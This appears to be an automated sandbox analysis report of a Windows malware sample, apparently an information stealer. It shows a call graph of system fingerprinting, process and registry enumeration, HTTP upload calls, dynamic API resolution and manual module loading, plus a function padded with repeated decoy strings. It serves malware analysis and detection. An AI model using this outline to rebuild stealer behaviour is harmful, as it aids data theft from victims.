lstrcpy 15193->15194 15195 ff20ad 15194->15195 15196 ffa9b0 4 API calls 15195->15196 15197 ff20d7 15196->15197 15198 ffa8a0 lstrcpy 15197->15198 15199 ff20e0 15198->15199 15200 ffa9b0 4 API calls 15199->15200 15201 ff2100 15200->15201 15202 ffa8a0 lstrcpy 15201->15202 15203 ff2109 15202->15203 15807 ff7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15203->15807 15206 ffa9b0 4 API calls 15207 ff2129 15206->15207 15208 ffa8a0 lstrcpy 15207->15208 15209 ff2132 15208->15209 15210 ffa9b0 4 API calls 15209->15210 15211 ff2151 15210->15211 15212 ffa8a0 lstrcpy 15211->15212 15213 ff215a 15212->15213 15214 ffa9b0 4 API calls 15213->15214 15215 ff217b 15214->15215 15216 ffa8a0 lstrcpy 15215->15216 15217 ff2184 15216->15217 15811 ff7f60 15217->15811 15220 ffa9b0 4 API calls 15221 ff21a4 15220->15221 15222 ffa8a0 lstrcpy 15221->15222 15223 ff21ad 15222->15223 15224 ffa9b0 4 API calls 15223->15224 15225 ff21cc 15224->15225 15226 ffa8a0 lstrcpy 15225->15226 15227 ff21d5 15226->15227 15228 ffa9b0 4 API calls 15227->15228 15229 ff21f6 15228->15229 15230 ffa8a0 lstrcpy 15229->15230 15231 ff21ff 15230->15231 15824 ff7ed0 GetSystemInfo wsprintfA 15231->15824 15234 ffa9b0 4 API calls 15235 ff221f 15234->15235 15236 ffa8a0 lstrcpy 15235->15236 15237 ff2228 15236->15237 15238 ffa9b0 4 API calls 15237->15238 15239 ff2247 15238->15239 15240 ffa8a0 lstrcpy 15239->15240 15241 ff2250 15240->15241 15242 ffa9b0 4 API calls 15241->15242 15243 ff2270 15242->15243 15244 ffa8a0 lstrcpy 15243->15244 15245 ff2279 15244->15245 15826 ff8100 GetProcessHeap RtlAllocateHeap 15245->15826 15248 ffa9b0 4 API calls 15249 ff2299 15248->15249 15250 ffa8a0 lstrcpy 15249->15250 15251 ff22a2 15250->15251 15252 ffa9b0 4 API calls 15251->15252 15253 ff22c1 15252->15253 15254 ffa8a0 lstrcpy 15253->15254 15255 ff22ca 15254->15255 15256 ffa9b0 4 API calls 15255->15256 15257 ff22eb 15256->15257 15258 ffa8a0 lstrcpy 15257->15258 15259 ff22f4 15258->15259 15832 ff87c0 15259->15832 15262 ffa920 3 API calls 15263 ff231e 15262->15263 15264 ffa8a0 lstrcpy 15263->15264 15265 ff2327 15264->15265 15266 ffa9b0 4 API calls 15265->15266 15267 ff2351 15266->15267 15268 ffa8a0 lstrcpy 15267->15268 15269 ff235a 15268->15269 15270 ffa9b0 4 API calls 15269->15270 15271 ff237a 15270->15271 15272 ffa8a0 lstrcpy 15271->15272 15273 ff2383 15272->15273 15274 ffa9b0 4 API calls 15273->15274 15275 ff23a2 15274->15275 15276 ffa8a0 lstrcpy 15275->15276 15277 ff23ab 15276->15277 15837 ff81f0 15277->15837 15279 ff23c2 15280 ffa920 3 API calls 15279->15280 15281 ff23d5 15280->15281 15282 ffa8a0 lstrcpy 15281->15282 15283 ff23de 15282->15283 15284 ffa9b0 4 API calls 15283->15284 15285 ff240a 15284->15285 15286 ffa8a0 lstrcpy 15285->15286 15287 ff2413 15286->15287 15288 ffa9b0 4 API calls 15287->15288 15289 ff2432 15288->15289 15290 ffa8a0 lstrcpy 15289->15290 15291 ff243b 15290->15291 15292 ffa9b0 4 API calls 15291->15292 15293 ff245c 15292->15293 15294 ffa8a0 lstrcpy 15293->15294 15295 ff2465 15294->15295 15296 ffa9b0 4 API calls 15295->15296 15297 ff2484 15296->15297 15298 ffa8a0 lstrcpy 15297->15298 15299 ff248d 15298->15299 15300 ffa9b0 4 API calls 15299->15300 15301 ff24ae 15300->15301 15302 ffa8a0 lstrcpy 15301->15302 15303 ff24b7 15302->15303 15845 ff8320 15303->15845 15305 ff24d3 15306 ffa920 3 API calls 15305->15306 15307 ff24e6 15306->15307 15308 ffa8a0 lstrcpy 15307->15308 15309 ff24ef 15308->15309 15310 ffa9b0 4 API calls 15309->15310 15311 ff2519 15310->15311 15312 ffa8a0 lstrcpy 15311->15312 15313 ff2522 15312->15313 15314 ffa9b0 4 API calls 15313->15314 15315 ff2543 15314->15315 15316 ffa8a0 lstrcpy 15315->15316 15317 ff254c 15316->15317 15318 ff8320 17 API calls 15317->15318 15319 ff2568 15318->15319 15320 ffa920 3 API calls 15319->15320 15321 ff257b 15320->15321 15322 ffa8a0 lstrcpy 15321->15322 15323 ff2584 15322->15323 15324 ffa9b0 4 API calls 15323->15324 15325 ff25ae 15324->15325 15326 ffa8a0 lstrcpy 15325->15326 15327 ff25b7 15326->15327 15328 ffa9b0 4 API calls 15327->15328 15329 ff25d6 15328->15329 15330 ffa8a0 lstrcpy 15329->15330 15331 ff25df 15330->15331 15332 ffa9b0 4 API calls 15331->15332 15333 ff2600 15332->15333 15334 ffa8a0 lstrcpy 15333->15334 15335 ff2609 15334->15335 15881 ff8680 15335->15881 15337 ff2620 15338 ffa920 3 API calls 15337->15338 15339 ff2633 15338->15339 15340 ffa8a0 lstrcpy 15339->15340 15341 ff263c 15340->15341 15342 ff265a lstrlen 15341->15342 15343 ff266a 15342->15343 15344 ffa740 lstrcpy 15343->15344 15345 ff267c 15344->15345 15346 fe1590 lstrcpy 15345->15346 15347 ff268d 15346->15347 15891 ff5190 15347->15891 15349 ff2699 15349->13780 16079 ffaad0 15350->16079 15352 fe5009 InternetOpenUrlA 15356 fe5021 15352->15356 15353 fe502a InternetReadFile 15353->15356 15354 fe50a0 InternetCloseHandle InternetCloseHandle 15355 fe50ec 15354->15355 15355->13784 15356->15353 15356->15354 16080 fe98d0 15357->16080 15359 ff0759 15360 ff077d 15359->15360 15361 ff0a38 15359->15361 15363 ff0799 StrCmpCA 15360->15363 15362 fe1590 lstrcpy 15361->15362 15364 ff0a49 15362->15364 15365 ff07a8 15363->15365 15391 ff0843 15363->15391 16256 ff0250 15364->16256 15367 ffa7a0 lstrcpy 15365->15367 15370 ff07c3 15367->15370 15369 ff0865 StrCmpCA 15371 ff0874 15369->15371 15409 ff096b 15369->15409 15372 fe1590 lstrcpy 15370->15372 15373 ffa740 lstrcpy 15371->15373 15374 ff080c 15372->15374 15376 ff0881 15373->15376 15377 ffa7a0 lstrcpy 15374->15377 15375 ff099c StrCmpCA 15378 ff09ab 15375->15378 15379 ff0a2d 15375->15379 15380 ffa9b0 4 API calls 15376->15380 15381 ff0823 15377->15381 15382 fe1590 lstrcpy 15378->15382 15379->13788 15383 ff08ac 15380->15383 15384 ffa7a0 lstrcpy 15381->15384 15385 ff09f4 15382->15385 15386 ffa920 3 API calls 15383->15386 15387 ff083e 15384->15387 15388 ffa7a0 lstrcpy 15385->15388 15389 ff08b3 15386->15389 16083 fefb00 15387->16083 15392 ff0a0d 15388->15392 15393 ffa9b0 4 API calls 15389->15393 15391->15369 15394 ffa7a0 lstrcpy 15392->15394 15395 ff08ba 15393->15395 15396 ff0a28 15394->15396 15397 ffa8a0 lstrcpy 15395->15397 15409->15375 15731 ffa7a0 lstrcpy 15730->15731 15732 fe1683 15731->15732 15733 ffa7a0 lstrcpy 15732->15733 15734 fe1695 15733->15734 15735 ffa7a0 lstrcpy 15734->15735 15736 fe16a7 15735->15736 15737 ffa7a0 lstrcpy 15736->15737 15738 fe15a3 15737->15738 15738->14611 15740 fe47c6 15739->15740 15741 fe4838 lstrlen 15740->15741 15765 ffaad0 15741->15765 15743 fe4848 InternetCrackUrlA 15744 fe4867 15743->15744 15744->14688 15746 fe4eee 15745->15746 15747 fe9af9 LocalAlloc 15745->15747 15746->14710 15746->14713 15747->15746 15748 fe9b14 CryptStringToBinaryA 15747->15748 15748->15746 15749 fe9b39 LocalFree 15748->15749 15749->15746 15751 ffa740 lstrcpy 15750->15751 15752 ff8b74 15751->15752 15753 ffa740 lstrcpy 15752->15753 15754 ff8b82 GetSystemTime 15753->15754 15756 ff8b99 15754->15756 15755 ffa7a0 lstrcpy 15757 ff8bfc 15755->15757 15756->15755 15757->14704 15759 ffa931 15758->15759 15760 ffa988 15759->15760 15762 ffa968 lstrcpy lstrcat 15759->15762 15761 ffa7a0 lstrcpy 15760->15761 15763 ffa994 15761->15763 15762->15760 15763->14707 15764->14822 15765->15743 15766->14832 15767->14973 15768->14975 15769->14983 15898 ff77a0 15770->15898 15773 ff1c1e 15773->15065 15774 ff76c6 RegOpenKeyExA 15775 ff76e7 RegQueryValueExA 15774->15775 15776 ff7704 RegCloseKey 15774->15776 15775->15776 15776->15773 15778 ff1c99 15777->15778 15778->15079 15780 ff1e09 15779->15780 15780->15121 15782 ff7a9a wsprintfA 15781->15782 15783 ff1e84 15781->15783 15782->15783 15783->15135 15785 ff7b4d 15784->15785 15786 ff1efe 15784->15786 15905 ff8d20 LocalAlloc CharToOemW 15785->15905 15786->15149 15789 ffa740 lstrcpy 15788->15789 15790 ff7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15789->15790 15799 ff7c25 15790->15799 15791 ff7d18 15793 ff7d1e LocalFree 15791->15793 15794 ff7d28 15791->15794 15792 ff7c46 GetLocaleInfoA 15792->15799 15793->15794 15795 ffa7a0 lstrcpy 15794->15795 15798 ff7d37 15795->15798 15796 ffa9b0 lstrcpy lstrlen lstrcpy lstrcat 15796->15799 15797 ffa8a0 lstrcpy 15797->15799 15798->15162 15799->15791 15799->15792 15799->15796 15799->15797 15801 ff2008 15800->15801 15801->15177 15803 ff94b5 15802->15803 15804 ff9493 GetModuleFileNameExA CloseHandle 15802->15804 15805 ffa740 lstrcpy 15803->15805 15804->15803 15806 ff2091 15805->15806 15806->15192 15808 ff7e68 RegQueryValueExA 15807->15808 15809 ff2119 15807->15809 15810 ff7e8e RegCloseKey 15808->15810 15809->15206 15810->15809 15812 ff7fb9 GetLogicalProcessorInformationEx 15811->15812 15813 ff7fd8 GetLastError 15812->15813 15816 ff8029 15812->15816 15821 ff8022 15813->15821 15823 ff7fe3 15813->15823 15817 ff89f0 2 API calls 15816->15817 15820 ff807b 15817->15820 15818 ff89f0 2 API calls 15819 ff2194 15818->15819 15819->15220 15820->15821 15822 ff8084 wsprintfA 15820->15822 15821->15818 15821->15819 15822->15819 15823->15812 15823->15819 15906 ff89f0 15823->15906 15909 ff8a10 GetProcessHeap RtlAllocateHeap 15823->15909 15825 ff220f 15824->15825 15825->15234 15827 ff89b0 15826->15827 15828 ff814d GlobalMemoryStatusEx 15827->15828 15829 ff8163 15828->15829 15830 ff819b wsprintfA 15829->15830 15831 ff2289 15830->15831 15831->15248 15833 ff87fb GetProcessHeap RtlAllocateHeap wsprintfA 15832->15833 15835 ffa740 lstrcpy 15833->15835 15836 ff230b 15835->15836 15836->15262 15838 ffa740 lstrcpy 15837->15838 15844 ff8229 15838->15844 15839 ff8263 15840 ffa7a0 lstrcpy 15839->15840 15842 ff82dc 15840->15842 15841 ffa9b0 lstrcpy lstrlen lstrcpy lstrcat 15841->15844 15842->15279 15843 ffa8a0 lstrcpy 15843->15844 15844->15839 15844->15841 15844->15843 15846 ffa740 lstrcpy 15845->15846 15847 ff835c RegOpenKeyExA 15846->15847 15848 ff83ae 15847->15848 15849 ff83d0 15847->15849 15850 ffa7a0 lstrcpy 15848->15850 15851 ff83f8 RegEnumKeyExA 15849->15851 15852 ff8613 RegCloseKey 15849->15852 15861 ff83bd 15850->15861 15853 ff843f wsprintfA RegOpenKeyExA 15851->15853 15854 ff860e 15851->15854 15855 ffa7a0 lstrcpy 15852->15855 15856 ff8485 RegCloseKey RegCloseKey 15853->15856 15857 ff84c1 RegQueryValueExA 15853->15857 15854->15852 15855->15861 15858 ffa7a0 lstrcpy 15856->15858 15859 ff84fa lstrlen 15857->15859 15860 ff8601 RegCloseKey 15857->15860 15858->15861 15859->15860 15862 ff8510 15859->15862 15860->15854 15861->15305 15863 ffa9b0 4 API calls 15862->15863 15864 ff8527 15863->15864 15865 ffa8a0 lstrcpy 15864->15865 15866 ff8533 15865->15866 15867 ffa9b0 4 API calls 15866->15867 15868 ff8557 15867->15868 15869 ffa8a0 lstrcpy 15868->15869 15870 ff8563 15869->15870 15871 ff856e RegQueryValueExA 15870->15871 15871->15860 15872 ff85a3 15871->15872 15873 ffa9b0 4 API calls 15872->15873 15874 ff85ba 15873->15874 15875 ffa8a0 lstrcpy 15874->15875 15876 ff85c6 15875->15876 15877 ffa9b0 4 API calls 15876->15877 15878 ff85ea 15877->15878 15879 ffa8a0 lstrcpy 15878->15879 15880 ff85f6 15879->15880 15880->15860 15882 ffa740 lstrcpy 15881->15882 15883 ff86bc CreateToolhelp32Snapshot Process32First 15882->15883 15884 ff875d CloseHandle 15883->15884 15885 ff86e8 Process32Next 15883->15885 15886 ffa7a0 lstrcpy 15884->15886 15885->15884 15890 ff86fd 15885->15890 15889 ff8776 15886->15889 15887 ffa9b0 lstrcpy lstrlen lstrcpy lstrcat 15887->15890 15888 ffa8a0 lstrcpy 15888->15890 15889->15337 15890->15885 15890->15887 15890->15888 15892 ffa7a0 lstrcpy 15891->15892 15893 ff51b5 15892->15893 15894 fe1590 lstrcpy 15893->15894 15895 ff51c6 15894->15895 15910 fe5100 15895->15910 15897 ff51cf 15897->15349 15901 ff7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15898->15901 15900 ff76b9 15900->15773 15900->15774 15902 ff7765 RegQueryValueExA 15901->15902 15903 ff7780 RegCloseKey 15901->15903 15902->15903 15904 ff7793 15903->15904 15904->15900 15905->15786 15907 ff8a0c 15906->15907 15908 ff89f9 GetProcessHeap HeapFree 15906->15908 15907->15823 15908->15907 15909->15823 15911 ffa7a0 lstrcpy 15910->15911 15912 fe5119 15911->15912 15913 fe47b0 2 API calls 15912->15913 15914 fe5125 15913->15914 16070 ff8ea0 15914->16070 15916 fe5184 15917 fe5192 lstrlen 15916->15917 15918 fe51a5 15917->15918 15919 ff8ea0 4 API calls 15918->15919 15920 fe51b6 15919->15920 15921 ffa740 lstrcpy 15920->15921 15922 fe51c9 15921->15922 15923 ffa740 lstrcpy 15922->15923 15924 fe51d6 15923->15924 15925 ffa740 lstrcpy 15924->15925 15926 fe51e3 15925->15926 15927 ffa740 lstrcpy 15926->15927 15928 fe51f0 15927->15928 15929 ffa740 lstrcpy 15928->15929 15930 fe51fd InternetOpenA StrCmpCA 15929->15930 15931 fe522f 15930->15931 15932 fe58c4 InternetCloseHandle 15931->15932 15933 ff8b60 3 API calls 15931->15933 15939 fe58d9 codecvt 15932->15939 15934 fe524e 15933->15934 15935 ffa920 3 API calls 15934->15935 15936 fe5261 15935->15936 15937 ffa8a0 lstrcpy 15936->15937 15938 fe526a 15937->15938 15940 ffa9b0 4 API calls 15938->15940 15943 ffa7a0 lstrcpy 15939->15943 15941 fe52ab 15940->15941 15942 ffa920 3 API calls 15941->15942 15944 fe52b2 15942->15944 15951 fe5913 15943->15951 15945 ffa9b0 4 API calls 15944->15945 15946 fe52b9 15945->15946 15947 ffa8a0 lstrcpy 15946->15947 15948 fe52c2 15947->15948 15949 ffa9b0 4 API calls 15948->15949 15950 fe5303 15949->15950 15952 ffa920 3 API calls 15950->15952 15951->15897 15953 fe530a 15952->15953 15954 ffa8a0 lstrcpy 15953->15954 15955 fe5313 15954->15955 15956 fe5329 InternetConnectA 15955->15956 15956->15932 15957 fe5359 HttpOpenRequestA 15956->15957 15959 fe58b7 InternetCloseHandle 15957->15959 15960 fe53b7 15957->15960 15959->15932 15961 ffa9b0 4 API calls 15960->15961 15962 fe53cb 15961->15962 15963 ffa8a0 lstrcpy 15962->15963 15964 fe53d4 15963->15964 15965 ffa920 3 API calls 15964->15965 15966 fe53f2 15965->15966 15967 ffa8a0 lstrcpy 15966->15967 15968 fe53fb 15967->15968 15969 ffa9b0 4 API calls 15968->15969 15970 fe541a 15969->15970 15971 ffa8a0 lstrcpy 15970->15971 15972 fe5423 15971->15972 15973 ffa9b0 4 API calls 15972->15973 15974 fe5444 15973->15974 15975 ffa8a0 lstrcpy 15974->15975 15976 fe544d 15975->15976 15977 ffa9b0 4 API calls 15976->15977 15978 fe546e 15977->15978 16071 ff8ead CryptBinaryToStringA 16070->16071 16072 ff8ea9 16070->16072 16071->16072 16073 ff8ece GetProcessHeap RtlAllocateHeap 16071->16073 16072->15916 16073->16072 16074 ff8ef4 codecvt 16073->16074 16075 ff8f05 CryptBinaryToStringA 16074->16075 16075->16072 16079->15352 16322 fe9880 16080->16322 16082 fe98e1 16082->15359 16084 ffa740 lstrcpy 16083->16084 16257 ffa740 lstrcpy 16256->16257 16258 ff0266 16257->16258 16259 ff8de0 2 API calls 16258->16259 16260 ff027b 16259->16260 16261 ffa920 3 API calls 16260->16261 16262 ff028b 16261->16262 16263 ffa8a0 lstrcpy 16262->16263 16264 ff0294 16263->16264 16265 ffa9b0 4 API calls 16264->16265 16323 fe988e 16322->16323 16326 fe6fb0 16323->16326 16325 fe98ad codecvt 16325->16082 16329 fe6d40 16326->16329 16330 fe6d63 16329->16330 16343 fe6d59 16329->16343 16345 fe6530 16330->16345 16334 fe6dbe 16334->16343 16355 fe69b0 16334->16355 16336 fe6e2a 16337 fe6ee6 VirtualFree 16336->16337 16339 fe6ef7 16336->16339 16336->16343 16337->16339 16338 fe6f41 16340 ff89f0 2 API calls 16338->16340 16338->16343 16339->16338 16341 fe6f38 16339->16341 16342 fe6f26 FreeLibrary 16339->16342 16340->16343 16344 ff89f0 2 API calls 16341->16344 16342->16339 16343->16325 16344->16338 16346 fe6542 16345->16346 16348 fe6549 16346->16348 16365 ff8a10 GetProcessHeap RtlAllocateHeap 16346->16365 16348->16343 16349 fe6660 16348->16349 16351 fe668f VirtualAlloc 16349->16351 16352 fe6730 16351->16352 16354 fe673c 16351->16354 16353 fe6743 VirtualAlloc 16352->16353 16352->16354 16353->16354 16354->16334 16356 fe69c9 16355->16356 16359 fe69d5 16355->16359 16357 fe6a09 LoadLibraryA 16356->16357 16356->16359 16358 fe6a32 16357->16358 16357->16359 16362 fe6ae0 16358->16362 16366 ff8a10 GetProcessHeap RtlAllocateHeap 16358->16366 16359->16336 16361 fe6ba8 GetProcAddress 16361->16359 16361->16362 16362->16359 16362->16361 16363 ff89f0 2 API calls 16363->16362 16364 fe6a8b 16364->16359 16364->16363 16365->16348 16366->16364

                                    Executed Functions

                                    Function 00FF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 ff9860-ff9874 call ff9750 663 ff987a-ff9a8e call ff9780 GetProcAddress * 21 660->663 664 ff9a93-ff9af2 LoadLibraryA * 5 660->664 663->664 666 ff9b0d-ff9b14 664->666 667 ff9af4-ff9b08 GetProcAddress 664->667 669 ff9b46-ff9b4d 666->669 670 ff9b16-ff9b41 GetProcAddress * 2 666->670 667->666 671 ff9b4f-ff9b63 GetProcAddress 669->671 672 ff9b68-ff9b6f 669->672 670->669 671->672 673 ff9b89-ff9b90 672->673 674 ff9b71-ff9b84 GetProcAddress 672->674 675 ff9b92-ff9bbc GetProcAddress * 2 673->675 676 ff9bc1-ff9bc2 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01800E78), ref: 00FF98A1
                                    • GetProcAddress.KERNEL32(75900000,01800D40), ref: 00FF98BA
                                    • GetProcAddress.KERNEL32(75900000,01800E90), ref: 00FF98D2
                                    • GetProcAddress.KERNEL32(75900000,01800ED8), ref: 00FF98EA
                                    • GetProcAddress.KERNEL32(75900000,01800CC8), ref: 00FF9903
                                    • GetProcAddress.KERNEL32(75900000,01808FC0), ref: 00FF991B
                                    • GetProcAddress.KERNEL32(75900000,017F4FA0), ref: 00FF9933
                                    • GetProcAddress.KERNEL32(75900000,017F4FE0), ref: 00FF994C
                                    • GetProcAddress.KERNEL32(75900000,01800F50), ref: 00FF9964
                                    • GetProcAddress.KERNEL32(75900000,01800C80), ref: 00FF997C
                                    • GetProcAddress.KERNEL32(75900000,01800D10), ref: 00FF9995
                                    • GetProcAddress.KERNEL32(75900000,01800D28), ref: 00FF99AD
                                    • GetProcAddress.KERNEL32(75900000,017F4F20), ref: 00FF99C5
                                    • GetProcAddress.KERNEL32(75900000,01800D58), ref: 00FF99DE
                                    • GetProcAddress.KERNEL32(75900000,01800D70), ref: 00FF99F6
                                    • GetProcAddress.KERNEL32(75900000,017F50E0), ref: 00FF9A0E
                                    • GetProcAddress.KERNEL32(75900000,01800D88), ref: 00FF9A27
                                    • GetProcAddress.KERNEL32(75900000,01800F98), ref: 00FF9A3F
                                    • GetProcAddress.KERNEL32(75900000,017F4E00), ref: 00FF9A57
                                    • GetProcAddress.KERNEL32(75900000,01800F80), ref: 00FF9A70
                                    • GetProcAddress.KERNEL32(75900000,017F5120), ref: 00FF9A88
                                    • LoadLibraryA.KERNEL32(01800FB0,?,00FF6A00), ref: 00FF9A9A
                                    • LoadLibraryA.KERNEL32(01800FC8,?,00FF6A00), ref: 00FF9AAB
                                    • LoadLibraryA.KERNEL32(01800FF8,?,00FF6A00), ref: 00FF9ABD
                                    • LoadLibraryA.KERNEL32(01800FE0,?,00FF6A00), ref: 00FF9ACF
                                    • LoadLibraryA.KERNEL32(01801010,?,00FF6A00), ref: 00FF9AE0
                                    • GetProcAddress.KERNEL32(75070000,01801028), ref: 00FF9B02
                                    • GetProcAddress.KERNEL32(75FD0000,01800F68), ref: 00FF9B23
                                    • GetProcAddress.KERNEL32(75FD0000,01809530), ref: 00FF9B3B
                                    • GetProcAddress.KERNEL32(75A50000,018095C0), ref: 00FF9B5D
                                    • GetProcAddress.KERNEL32(74E50000,017F5000), ref: 00FF9B7E
                                    • GetProcAddress.KERNEL32(76E80000,01809060), ref: 00FF9B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00FF9BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00FF9BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: e721921819e76216ced36c1b1f4c853a71bb544a295e672bf52f327a0637938d
                                    • Instruction ID: 627401fe6b61da19a0cb136990138458c85e5c45bce7f7247e3042e9cf17a680
                                    • Opcode Fuzzy Hash: e721921819e76216ced36c1b1f4c853a71bb544a295e672bf52f327a0637938d
                                    • Instruction Fuzzy Hash: 69A148B5501200BFD378EFA8FA8CA6E37F9F78C201704652AE606C7E4CD6799841CB15
                                    Function 00FE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 fe45c0-fe4695 RtlAllocateHeap 781 fe46a0-fe46a6 764->781 782 fe474f-fe47a9 VirtualProtect 781->782 783 fe46ac-fe474a 781->783 783->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FE479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46D8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
